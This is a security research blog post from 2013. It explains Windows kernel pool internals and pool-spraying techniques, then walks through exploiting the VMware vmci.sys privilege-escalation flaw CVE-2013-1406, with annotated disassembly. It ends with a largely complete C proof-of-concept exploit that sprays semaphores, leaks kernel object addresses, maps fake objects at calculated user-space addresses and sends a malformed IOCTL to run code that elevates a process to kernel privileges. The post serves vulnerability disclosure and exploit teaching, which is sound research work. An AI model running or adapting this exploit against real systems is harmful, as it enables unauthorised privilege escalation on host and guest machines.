Pages

Wednesday, March 6, 2013

Stars aligner’s how-to: kernel pool spraying and VMware CVE-2013-1406

If you deal with Windows kernel vulnerabilities, it is likely that you’ll have to deal with a kernel pool in order to develop an exploit. I guess it is useful to learn how to keep the behavior of this kernel entity under your control.

In this article I will try to give a high level overview of kernel pool internals. This object has already been deeply researched several times, so if you need more technical information, please google it or use the references at the end of this article.

Kernel pool structure overview
Kernel pool is a common place for mining memory in the operating system kernel. Remember that there are very small stacks in the kernel environment. They are suitable only for a small bunch of local non-array variables. Once a driver needs to create a large data structure or a string, it will certainly use the pool memory.

There are different types of pools, but all of them have the same structure (except of the driver verifier’s special pool). Every pool has a special control structure called a pool descriptor. Among the other purposes, it maintains lists of free pool chunks, which represent a free pool space. A pool itself consists of memory pages. They can be standard 4 KB or large 1 MB in size. The number of pages used for the pool is dynamically adjusted.

Kernel pool pages are then split into chunks. These are the exact chunks that drivers are given when requesting memory from the pool.


Pool chunk on x86 systems

Pool chunks have the following meta-information inside

1. Previous size — a size of the preceding chunk.

2. Pool index field is used for situations with more than one pool of a certain type. For example, there are multiple paged pools in the system. This field is used to identify which exact paged pool this chunk belongs to.

3. Block size is a size of the current chunk. Just like the previous size field, the size is encoded as (pool chunk data size + size of pool header + optional 4 bytes of a pointer to the process quoted) >> 3 (or >> 4 on x64 systems).

4. Pool type field is a flag bitmask for the current chunk. Notice that those flags are not officially documented.

  • T (Tracked): this chunk is tracked by the driver verifier. Pool tracking is used for debugging purposes.
  • S (Session): the chunk belongs to the paged session pool, it is a special pool used for session specific allocations.
  • Q (Quota): the chunk takes part in quota management mechanism. This flag is only relevant for 32-bit systems. If this flag is present, a pointer to the process quoted this chunk is stored at the end of the chunk.
  • U (In use): this chunk is currently in use. As opposed a chunk can be free, which means that we can allocate memory from it. This flag is a third bit for pre-vista systems and the second for vista and upper.
  • B (Base pool) identifies a pool which the chunk belongs to. There are two base pools – paged and non-paged. Non-paged pool is encoded as 0 and paged pool as 1. For pre-vista systems this flag could occupy two bits because the base pool type was encoded as (base pool type + 1), that is 0x10 for paged pool and 0x1 for non-paged pool.

5. Pool tag is used for debugging purposes. Drivers specify a four-byte character signature which identifies a subsystem or a driver that uses this chunk. For example “NtFs” tag means that this chunk belongs to the ntfs.sys driver.

Pool chunk on x64 systems

There is a couple of differences on 64-bit systems. The first one is a different size for fields and the second one is a new 8-byte field with a pointer to the process that quoted this chunk.

Kernel pool memory allocation overview
Imagine that the pool is empty. I mean there is no pool space at all. If we try to allocate memory from the pool (let’s say that its size is less than 0xFF0), it will first allocate a memory page and then place a chunk of the requested size on it. Since it is the first allocation on this page, the chunk will be placed at the start of this page.


The first pool chunk allocation sequence

This page has now two pool chunks — the one that we allocated and a free one. The free chunk can now be used for consequent allocations. But from this moment pool allocator tends to place new chunks at the end of the page or the free space within this page.


Pool chunk allocation strategy

When it comes to the deallocation of the chunks, the process is repeated in a reverse order. The chunks become free, and they are merged if they are adjacent.


Pool deallocation strategy

The whole situation with empty pools is just a fantasy, because the pools are charged with memory pages by the moment we can actually use them.

Controlling the behavior of chunk allocations
Let’s keep in mind the fact that kernel pool is a heavily-used object. First of all it used for creating all sorts of kernel objects, private kernel and drivers structures. Secondly, kernel pool takes part in a number of system calls, providing a buffer for the corresponding parameters. Since the computer is constantly servicing hardware by means of drivers and software by means of system calls, you can imagine the rate of kernel pool usage even when the system stays idle.

Sooner or later kernel pool becomes fragmented. It happens because of different sizes of allocations and frees following in a different order. Here goes out the origin of the “spraying” term — when sequentially allocating chunks of pool, those chunks are not necessarily followed by each other, there are most likely to be located at completely different places in memory. So, when filling the pool memory with controlled red-painted chunks we are likely going to see the left side of a picture, then the right one.


Heap spraying leads to the left picture, not the right one

But there is an important exploiting-relevant circumstance: when there is no black region left for painting, we’ll get a new black region without stranger’s spots. From this point our spray becomes an ordinary brush with solid color fill. From here we have a considerable level of controlling the behavior of chunk allocation and a picture of the pool. We say considerable because it is still not the case when we are guaranteed to be the painting master, because our painting process can be interrupted by someone else spilling a different color.


The spraying becomes filling when using a lot of objects

Depending on a type of an object that we are using for spraying, we are able to create free windows of needed size by freeing a number of objects that we created before. And the most important fact that allows us to make a controlled allocation is that pool allocator tends to be as fast as it is possible. In order to use processor cache effectively the last freed pool chunk will be the first one that is allocated! It is the point of the controlled allocation because we can guess the address of the chunk to be allocated.

Of course the size of the allocation matters. That’s why we have to calculate the size of the free chunks window. If we have to allocate a 0x315 bytes chunk, and we are spraying 0x20 bytes chunks, we have to free 0x315 / 0x20 = (0x18 + 1) chunks. I hope this is clear enough.

Here are some points we need to consider in order to be successful in kernel pool spraying:

1. If you don’t have an opportunity of allocating the kernel pool with some sort of a target driver, you can always use windows objects as spraying objects. Since windows object are naturally the object of the operating system kernel, they are stored in kernel pools.

  • For non-paged pool you can use processes, threads, events, semaphores, mutexes etc. 
  • For paged pool you can use directory objects, key objects, section objects (also known as file mapping) etc. 
  • For session pool you can use any GDI or USER object: palettes, DCs, brushes etc.

In order to free the memory occupied by those objects, you can simply close all open handles to them.

2. By the time we are going to start spraying there are pages available for pool usage, but they are too defragmented. If we need a space filled sequentially with controlled chunks, we need to spam the pool so there is no place on currently available pages. After this we’ll get a new clean page leading to the chance of sequential allocation of controlled chunks. In a nutshell, create lots of spraying objects.

3. When calculating a necessary window size, keep in mind that chunk header size matters, also the whole size is rounded up to 8 and 16 bytes on x86 and x64 machines respectively.

4. Although we are able to control the manner of allocation of the pool chunks, it is difficult to predict relative positions of the sprayed objects. If you use windows object for spraying thus having only the handle of an object but not it’s address, you can leak kernel object using the NtQuerySystemInformation() function with SystemExtendedHandleInformation class. It will provide you all the information needed for precise spraying.

5. Keep the balance of the sprayed objects quantity. You’ll probably fail controlling the chunk allocation when the is no memory left in the system at all.

6. One of the tricks that might help you improve reliability of kernel pool based exploits is assigning a high priority to the spraying and triggering thread. Since there is a race for using the pool memory it is useful to modify the pool sharing priority by having more chances to execute than the other threads in the system. It will help you to keep your spraying more consistent. Also consider the gap between spraying and triggering the vulnerability: the less it is, the more chance you get to land on the controlled pool chunk.

VMware CVE 2013-1406
A couple of weeks ago an interesting advisory by VMware was published. It promised local privilege escalation on both host and guest systems thus leading to a double ownage.

The vulnerable component was vmci.sys. VMCI stands for Virtual Machine Communication Interface. It is used for fast and efficient communication between guest virtual machines and their host server. VMCI presents a custom socket type implemented as a Windows Socket Service Provider in a vsocklib.dll library. The module vmci.sys creates a virtual device that implements the needed functionality. This driver is always running on the host system. As for guest systems, VMware tools have to be installed in order to use VMCI.

When writing an overview it would be nice to explain a high-level logic of vulnerability in order to present a detective-like story. Unfortunately this is not the case, because there is not much public information about VMCI implementation. I don’t think that people who exploit vulnerabilities always go deep into details reverse engineering the whole target system. At least it would be more profitable to obtain a stable working exploit within a week than a high-level knowledge of how the things work in months.

PatchDiff highlight three patched functions. All of them were relevant to the same IOCTL code 0x8103208C – something terribly went wrong with handling it.




Control flow of the code processing the 0x8103208C IOCTL


The third patched function eventually was called both from the first and the second ones. The third function is supposed to allocate a pool chunk of a requested size times 0x68 and initialize it with zeroes. It contained an internal structure for dispatching the request. The problem was that a chunk size was specified in a user buffer for this IOCTL code and was not checked properly. As a result, an internal structure was not allocated which led to interesting consequences.

A buffer is supplied for this IOCTL, its size is supposed to be 0x624 in order to reach patched functions. In order to process user request in internal structure is allocated, its size is 0x20C. Its first 4 bytes were filled with a value, specified at [user_buffer + 0x10]. These exact bytes are used to allocate another internal structure the pointer to which is then stored at the last four bytes of the first one. But no matter was the second chunk allocated or not, a sort of a dispatch function was invoked.

.text:0001B2B4     ; int __stdcall DispatchChunk(PVOID pChunk)
.text:0001B2B4     DispatchChunk   proc near               ; CODE XREF: PatchedOne+78
.text:0001B2B4                                             ; UnsafeCallToPatchedThree+121
.text:0001B2B4
.text:0001B2B4     pChunk          = dword ptr  8
.text:0001B2B4
.text:0001B2B4 000                 mov     edi, edi
.text:0001B2B6 000                 push    ebp
.text:0001B2B7 004                 mov     ebp, esp
.text:0001B2B9 004                 push    ebx
.text:0001B2BA 008                 push    esi
.text:0001B2BB 00C                 mov     esi, [ebp+pChunk]
.text:0001B2BE 00C                 mov     eax, [esi+208h]
.text:0001B2C4 00C                 xor     ebx, ebx
.text:0001B2C6 00C                 cmp     eax, ebx
.text:0001B2C8 00C                 jz      short CheckNullUserSize
.text:0001B2CA 00C                 push    eax             ; P
.text:0001B2CB 010                 call    ProcessParam ; We won’t get here
.text:0001B2D0
.text:0001B2D0     CheckNullUserSize:                      ; CODE XREF: DispatchChunk+14
.text:0001B2D0 00C                 cmp     [esi], ebx
.text:0001B2D2 00C                 jbe     short CleanupAndRet
.text:0001B2D4 00C                 push    edi
.text:0001B2D5 010                 lea     edi, [esi+8]
.text:0001B2D8
.text:0001B2D8     ProcessUserBuff:                        ; CODE XREF: DispatchChunk+51
.text:0001B2D8 010                 mov     eax, [edi]
.text:0001B2DA 010                 test    eax, eax
.text:0001B2DC 010                 jz      short NextCycle
.text:0001B2DE 010                 or      ecx, 0FFFFFFFFh
.text:0001B2E1 010                 lea     edx, [eax+38h]
.text:0001B2E4 010                 lock xadd [edx], ecx
.text:0001B2E8 010                 cmp     ecx, 1
.text:0001B2EB 010                 jnz     short DerefObj
.text:0001B2ED 010                 push    eax
.text:0001B2EE 014                 call    UnsafeFire      ; BANG!!!!
.text:0001B2F3
.text:0001B2F3     DerefObj:                               ; CODE XREF: DispatchChunk+37
.text:0001B2F3 010                 mov     ecx, [edi+100h] ; Object
.text:0001B2F9 010                 call    ds:ObfDereferenceObject
.text:0001B2FF
.text:0001B2FF     NextCycle:                              ; CODE XREF: DispatchChunk+28
.text:0001B2FF 010                 inc     ebx
.text:0001B300 010                 add     edi, 4
.text:0001B303 010                 cmp     ebx, [esi]
.text:0001B305 010                 jb      short ProcessUserBuff
.text:0001B307 010                 pop     edi
.text:0001B308
.text:0001B308     CleanupAndRet:                          ; CODE XREF: DispatchChunk+1E
.text:0001B308 00C                 push    20Ch            ; size_t
.text:0001B30D 010                 push    esi             ; void *
.text:0001B30E 014                 call    ZeroChunk
.text:0001B313 00C                 push    'gksv'          ; Tag
.text:0001B318 010                 push    esi             ; P
.text:0001B319 014                 call    ds:ExFreePoolWithTag
.text:0001B31F 00C                 pop     esi
.text:0001B320 008                 pop     ebx
.text:0001B321 004                 pop     ebp
.text:0001B322 000                 retn    4
.text:0001B322     DispatchChunk   endp
The dispatch function was searching for a pointer to process. The processing included dereferencing some object and calling some function if an appropriate flag had been set inside the pointed structure. But since we had failed to allocate a structure to process, the dispatch function slid beyond the end of the first chunk. This processing leads to an access violation and a following BSOD when uncontrolled.

IOCTL dispatch structure and the dispatcher behavior 

So we’ve got a possible code execution at the controlled address:
.text:0001B946     UnsafeFire      proc near            
.text:0001B946                                          
.text:0001B946
.text:0001B946     arg_0           = dword ptr  8
.text:0001B946
.text:0001B946 000                 mov     edi, edi
.text:0001B948 000                 push    ebp
.text:0001B949 004                 mov     ebp, esp
.text:0001B94B 004                 mov     eax, [ebp+arg_0]
.text:0001B94E 004                 push    eax
.text:0001B94F 008                 call    dword ptr [eax+0ACh] ; BANG!!!!
.text:0001B955 004                 pop     ebp
.text:0001B956 000                 retn    4
.text:0001B956     UnsafeFire      endp
Exploitation
Since the chunk dispatch code slips beyond the chunk it is supposed to process, it meets the neighbor chunk or an unmapped page. If it falls into an unmapped memory, a BSOD occurs. But when it meets another pool chunk it tries to process a pool header interpreting it as a pointer.

Consider x86 system. The four bytes the dispatcher function tries to interpret as a pointer are the previous block size, pool index, current block size and pool type flags. Since we know the size and a pool index used for the skipped chunk, we know the low word of a pointer:

0xXXXX0043 – 0x43 is a size of a skipped chunk, thus becomes a previous size of a chunk in a neighbor. 0x0 is a pool index, which is guaranteed to be equal to 0, since non-paged pool used for the skipped chunk is the only one in the system. Notice that if the two adjacent chunks share the same pool page, they belong to the same pool type and index.

The high word contains the block size, which we can’t predict and pool type flags which we can:

B = 0 because the chunk is from the non-paged pool,
U = 1 because the is supposed to be in use,
Q = 0/1 the chunk might be quoted,
S = 0 because the pool is not the session one,
T = 0 pool tracking is likely to be disabled by default.

The unused bits in the pool type field are equal to 0.

So we’ve got the following memory windows valid for Windows 7 and Windows 8:
  1. 0x04000000 – 0x06000000 for ordinary chunks
  2. 0x14000000 – 0x16000000 for quoted chunks
Based on the provided information you can easily calculate memory windows for Windows XP and alike.

As you can see, those memory ranges belong to the user space, so we are able to force the vulnerable dispatch function to execute a shellcode that we provide. In order to perform arbitrary code execution we have to map the calculated regions and meet the requirements of the dispatch function:

1. Within the [0x43 + 0x38] place a DWORD value of 1 in order to meet the requirements of the following code:
.text:0001B2E1 010                 lea     edx, [eax+38h]
.text:0001B2E4 010                 lock xadd [edx], ecx
.text:0001B2E8 010                 cmp     ecx, 1
2. Within the [0x43 + 0xAC] place a pointer to the function to be called, or simply the address of a shellcode.

3. Within the [0x43 + 0x100] place a pointer of a fake object to be dereferenced with ObfDereferenceObject() function. Notice that the reference count is taken from the object header, which is located at a negative offset to the object itself, so be sure that this function is not going to land on the unmapped region. Also provide a suitable reference count in order the ObfDereferenceObject() would not try to free the user-mode memory with the functions that are not suited for that.

4. Repeat this algorithm for every 0x10000 bytes.

Everything has been done right!

Improving reliability of an exploit
Although we have developed a nice strategy of exploitation, it is still unreliable. Consider the case when the chunk after vulnerable one is freed. It is difficult to guess the state of this chunk fields. That means that although such chunk forms a pointer valid for the dispatch function (because it is not NULL) the result of the dispatching will lead to a BSOD. It is also true for the case when the dispatch function slides to an unmapped virtual address.

Kernel pool spraying is very useful in this case. As a spraying object I chose semaphores since they could provide the closest chunk size to the one I needed. As a result this technique helped a lot improving the stability of an exploit.

Remember that Windows 8 has a SMEP support, so it is a little bit more complicate to exploit due to the laziness of a shellcode developer. Writing a base-independent code and bypassing SMEP is left as an exercise for a reader.

As for the x64 systems, the problem is that the pointer became 8 bytes in size. This means that a high DWORD of a pointer interpreted in the dispatch function falls on the pool chunk tag field. As far as most drivers and kernel subsystems user ASCII symbols for tagging, the pointer falls into non-canonical address space, so it can’t be used for exploitation. By this time I was unable to find a solution for this problem.

In the end
I hope this article was useful for you, and I’m sorry that I could not fit all the needed information in a couple of paragraphs. I wish you good luck in researching and exploiting for the sake of making the things more secure.

Source Code:
/*
    CVE-2013-1406 exploitation PoC
    by Artem Shishkin,
    Positive Research,
    Positive Technologies,
    02-2013
*/

void __stdcall FireShell(DWORD dwSomeParam)
{
    EscalatePrivileges(hProcessToElevate);
    // Equate the stack and quit the cycle
#ifndef _AMD64_
    __asm
    {
        pop ebx
        pop edi
        push 0xFFFFFFF8
        push 0xA010043
    }
#endif
}


HANDLE LookupObjectHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, PVOID pObjectAddr, DWORD dwProcessID = 0)
{
    HANDLE            hResult = 0;
    DWORD            dwLookupProcessID = dwProcessID;

    if (pHandleTable == NULL)
    {
        printf("Ain't funny\n");
        return 0;
    }

    if (dwLookupProcessID == 0)
    {
        dwLookupProcessID = GetCurrentProcessId();
    }

    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].Object == pObjectAddr))
        {
            hResult = pHandleTable->Handles[i].HandleValue;
            break;
        }
    }

    return hResult;
}

PVOID LookupObjectAddress(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0)
{
    PVOID    pResult = 0;
    DWORD    dwLookupProcessID = dwProcessID;

    if (pHandleTable == NULL)
    {
        printf("Ain't funny\n");
        return 0;
    }

    if (dwLookupProcessID == 0)
    {
        dwLookupProcessID = GetCurrentProcessId();
    }

    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject))
        {
            pResult = (HANDLE)pHandleTable->Handles[i].Object;
            break;
        }
    }

    return pResult;
}

void CloseTableHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0)
{
    DWORD    dwLookupProcessID = dwProcessID;

    if (pHandleTable == NULL)
    {
        printf("Ain't funny\n");
        return;
    }

    if (dwLookupProcessID == 0)
    {
        dwLookupProcessID = GetCurrentProcessId();
    }

    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject))
        {
            pHandleTable->Handles[i].Object = NULL;
            pHandleTable->Handles[i].HandleValue = NULL;
            break;
        }
    }

    return;
}

void PoolSpray()
{
    // Init used native API function
    lpNtQuerySystemInformation NtQuerySystemInformation = (lpNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
    if (NtQuerySystemInformation == NULL)
    {
        printf("Such a fail...\n");
        return;
    }
    
    // Determine object size
    // xp: 
    //const DWORD_PTR dwSemaphoreSize = 0x38;
    // 7:
    //const DWORD_PTR dwSemaphoreSize = 0x48;

    DWORD_PTR dwSemaphoreSize = 0;

    if (LOBYTE(GetVersion()) == 5)
    {
        dwSemaphoreSize = 0x38;
    }
    else if (LOBYTE(GetVersion()) == 6)
    {
        dwSemaphoreSize = 0x48;
    }

    unsigned int cycleCount = 0;
    while (cycleCount < 50000)
    {
        HANDLE hTemp = CreateSemaphore(NULL, 0, 3, NULL);
        if (hTemp == NULL)
        {
            break;
        }

        ++cycleCount;
    }

    printf("\t[+] Spawned lots of semaphores\n");

    printf("\t[.] Initing pool windows\n");
    Sleep(2000);

    DWORD dwNeeded = 4096;
    NTSTATUS status = 0xFFFFFFFF;
    PVOID pBuf = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE);

    while (true)
    {
        status = NtQuerySystemInformation(SystemExtendedHandleInformation, pBuf, dwNeeded, NULL);
        if (status != STATUS_SUCCESS)
        {
            dwNeeded *= 2;
            VirtualFree(pBuf, 0, MEM_RELEASE);
            pBuf = VirtualAlloc(NULL, dwNeeded, MEM_COMMIT, PAGE_READWRITE);
        }
        else
        {
            break;
        }
    };

    HANDLE hHandlesToClose[0x30] = {0};
    DWORD dwCurPID = GetCurrentProcessId();
    PSYSTEM_HANDLE_INFORMATION_EX pHandleTable = (PSYSTEM_HANDLE_INFORMATION_EX)pBuf;

    for (ULONG i = 0; i < pHandleTable->NumberOfHandles; i++)
    {
        if (pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwCurPID)
        {
            DWORD_PTR    dwTestObjAddr = (DWORD_PTR)pHandleTable->Handles[i].Object;
            DWORD_PTR    dwTestHandleVal = (DWORD_PTR)pHandleTable->Handles[i].HandleValue;
            DWORD_PTR    dwWindowAddress = 0;
            bool        bPoolWindowFound = false;

            UINT iObjectsNeeded = 0;
            // Needed window size is vmci packet pool chunk size (0x218) divided by
            // Semaphore pool chunk size (dwSemaphoreSize)
            iObjectsNeeded = (0x218 / dwSemaphoreSize) + ((0x218 % dwSemaphoreSize != 0) ? 1 : 0);
        
            if (
                    // Not on a page boundary
                    ((dwTestObjAddr & 0xFFF) != 0) 
                    && 
                    // Doesn't cross page boundary
                    (((dwTestObjAddr + 0x300) & 0xF000) == (dwTestObjAddr & 0xF000)) 
                )
            {
                // Check previous object for being our semaphore
                DWORD_PTR dwPrevObject = dwTestObjAddr - dwSemaphoreSize;
                if (LookupObjectHandle(pHandleTable, (PVOID)dwPrevObject) == NULL)
                {
                    continue;
                }

                for (unsigned int j = 1; j < iObjectsNeeded; j++)
                {
                    DWORD_PTR dwNextTestAddr = dwTestObjAddr + (j * dwSemaphoreSize);
                    HANDLE hLookedUp = LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr);

                    //printf("dwTestObjPtr = %08X, dwTestObjHandle = %08X\n", dwTestObjAddr, dwTestHandleVal);
                    //printf("\tdwTestNeighbour = %08X\n", dwNextTestAddr);
                    //printf("\tLooked up handle = %08X\n", hLookedUp);

                    if (hLookedUp != NULL)
                    {
                        hHandlesToClose[j] = hLookedUp;

                        if (j == iObjectsNeeded - 1)
                        {
                            // Now test the following object
                            dwNextTestAddr = dwTestObjAddr + ((j + 1) * dwSemaphoreSize);
                            if (LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr) != NULL)
                            {
                                hHandlesToClose[0] = (HANDLE)dwTestHandleVal;
                                bPoolWindowFound = true;

                                dwWindowAddress = dwTestObjAddr;

                                // Close handles to create a memory window
                                for (int k = 0; k < iObjectsNeeded; k++)
                                {
                                    if (hHandlesToClose[k] != NULL)
                                    {
                                        CloseHandle(hHandlesToClose[k]);
                                        CloseTableHandle(pHandleTable, hHandlesToClose[k]);
                                    }
                                }
                            }
                            else
                            {
                                memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
                                break;
                            }
                        }
                    }
                    else
                    {
                        memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
                        break;
                    }
                }

                if (bPoolWindowFound)
                {
                    printf("\t[+] Window found at %08X!\n", dwWindowAddress);
                }

            }
        }
    }

    VirtualFree(pBuf, 0, MEM_RELEASE);

    return;
}

void InitFakeBuf(PVOID pBuf, DWORD dwSize)
{
    if (pBuf != NULL)
    {
        RtlFillMemory(pBuf, dwSize, 0x11);
    }

    return;
}

void PlaceFakeObjects(PVOID pBuf, DWORD dwSize, DWORD dwStep)
{
    /*
        Previous chunk size will be always 0x43 and the pool index will be 0, so the last bytes will be 0x0043
        So, for every 0xXXXX0043 address we must suffice the following conditions:

        lea        edx, [eax+38h]
        lock    xadd [edx], ecx
        cmp        ecx, 1

        Some sort of lock at [addr + 38] must be equal to 1. And

        call    dword ptr [eax+0ACh]

        The call site is located at [addr + 0xAC]

        Also fake the object to be dereferenced at [addr + 0x100]
    */

    if (pBuf != NULL)
    {
        for (PUCHAR iAddr = (PUCHAR)pBuf + 0x43; iAddr < (PUCHAR)pBuf + dwSize; iAddr = iAddr + dwStep)
        {
            PDWORD pLock = (PDWORD)(iAddr + 0x38);
            PDWORD_PTR pCallMeMayBe = (PDWORD_PTR)(iAddr + 0xAC);
            PDWORD_PTR pFakeDerefObj = (PDWORD_PTR)(iAddr + 0x100);

            *pLock = 1;
            *pCallMeMayBe = (DWORD_PTR)FireShell;
            *pFakeDerefObj = (DWORD_PTR)pBuf + 0x1000;
        }
    }

    return;
}

void PenetrateVMCI()
{
    /*

        VMware Security Advisory
        Advisory ID:    VMSA-2013-0002
        Synopsis:    VMware ESX, Workstation, Fusion, and View VMCI privilege escalation vulnerability
        Issue date:    2013-02-07
        Updated on:    2013-02-07 (initial advisory)
        CVE numbers:    CVE-2013-1406

    */

    DWORD dwPidToElevate = 0;
    HANDLE hSuspThread = NULL;

    bool bXP = (LOBYTE(GetVersion()) == 5);
    bool b7 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 1));
    bool b8 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 2));

    if (!InitKernelFuncs())
    {
        printf("[-] Like I don't know where the shellcode functions are\n");
        return;
    }

    if (bXP)
    {
        printf("[?] Who do we want to elevate?\n");
        scanf_s("%d", &dwPidToElevate);

        hProcessToElevate = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPidToElevate);
        if (hProcessToElevate == NULL)
        {
            printf("[-] This process doesn't want to be elevated\n");
            return;
        }
    }

    if (b7 || b8)
    {
        // We are unable to change an active process token on-the-fly,
        // so we create a custom shell suspended (Ionescu hack)
        STARTUPINFO si = {0};
        PROCESS_INFORMATION pi = {0};

        si.wShowWindow = TRUE;

        WCHAR cmdPath[MAX_PATH] = {0};
        GetSystemDirectory(cmdPath, MAX_PATH);
        wcscat_s(cmdPath, MAX_PATH, L"\\cmd.exe");

        if (CreateProcess(cmdPath, L"", NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi) == TRUE)
        {
            hProcessToElevate = pi.hProcess;
            hSuspThread = pi.hThread;
        }
    }

    HANDLE hVMCIDevice = CreateFile(L"\\\\.\\vmci", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
    if (hVMCIDevice != INVALID_HANDLE_VALUE)
    {
        UCHAR BadBuff[0x624] = {0};
        UCHAR retBuf[0x624] = {0};
        DWORD dwRet = 0;

        printf("[+] VMCI service found running\n");

        PVM_REQUEST pVmReq = (PVM_REQUEST)BadBuff;
        pVmReq->Header.RequestSize = 0xFFFFFFF0;
        
        PVOID pShellSprayBufStd = NULL;
        PVOID pShellSprayBufQtd = NULL;
        PVOID pShellSprayBufStd7 = NULL;
        PVOID pShellSprayBufQtd7 = NULL;
        PVOID pShellSprayBufChk8 = NULL;

        if ((b7) || (bXP) || (b8))
        {
            /*
                Significant bits of a PoolType of a chunk define the following regions:
                0x0A000000 - 0x0BFFFFFF - Standard chunk
                0x1A000000 - 0x1BFFFFFF - Quoted chunk
                0x0 - 0xFFFFFFFF - Free chunk - no idea

                Addon for Windows 7:
                Since PoolType flags have changed, and "In use flag" is now 0x2,
                define an additional region for Win7:

                0x04000000 - 0x06000000 - Standard chunk
                0x14000000 - 0x16000000 - Quoted chunk
            */
            
            pShellSprayBufStd = VirtualAlloc((LPVOID)0xA000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufQtd = VirtualAlloc((LPVOID)0x1A000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufStd7 = VirtualAlloc((LPVOID)0x4000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            pShellSprayBufQtd7 = VirtualAlloc((LPVOID)0x14000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

            if ((pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL))
            {
                printf("\t[-] Unable to map the needed memory regions, please try running the app again\n");
                CloseHandle(hVMCIDevice);
                return;
            }

            InitFakeBuf(pShellSprayBufStd, 0x2000000);
            InitFakeBuf(pShellSprayBufQtd, 0x2000000);
            InitFakeBuf(pShellSprayBufStd7, 0x2000000);
            InitFakeBuf(pShellSprayBufQtd7, 0x2000000);

            PlaceFakeObjects(pShellSprayBufStd, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufQtd, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufStd7, 0x2000000, 0x10000);
            PlaceFakeObjects(pShellSprayBufQtd7, 0x2000000, 0x10000);

            if (SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL) == FALSE)
            {
                SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);
            }

            PoolSpray();

            if (DeviceIoControl(hVMCIDevice, 0x8103208C, BadBuff, sizeof(BadBuff), retBuf, sizeof(retBuf), &dwRet, NULL) == TRUE)
            {
                printf("\t[!] If you don't see any BSOD, you're successful\n");

                if (b7 || b8)
                {
                    ResumeThread(hSuspThread);
                }
            }
            else
            {
                printf("[-] Not this time %d\n", GetLastError());
            }

            if (pShellSprayBufStd != NULL)
            {
                VirtualFree(pShellSprayBufStd, 0, MEM_RELEASE);
            }

            if (pShellSprayBufQtd != NULL)
            {
                VirtualFree(pShellSprayBufQtd, 0, MEM_RELEASE);
            }
        }

        SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);

        CloseHandle(hVMCIDevice);
    }
    else
    {
        printf("[-] Like I don't see vmware here\n");
    }

    CloseHandle(hProcessToElevate);

    return;
}
References
[1] Tarjei Mandt. Kernel Pool Exploitation on Windows 7. Black Hat DC, 2011
[2] Nikita Tarakanov. Kernel Pool Overflow from Windows XP to Windows 8. ZeroNights, 2011
[3] Kostya Kortchinsky. Real world kernel pool exploitation. SyScan, 2008
[4] SoBeIt. How to exploit Windows kernel memory pool. X’con, 2005

Video Demonstration:



Author: Artem Shishkin, Positive Research.

2 comments:

  1. This comment has been removed by a blog administrator.

    ReplyDelete
  2. Congratulations on the solid piece of work, Artem. Keep it up!

    ReplyDelete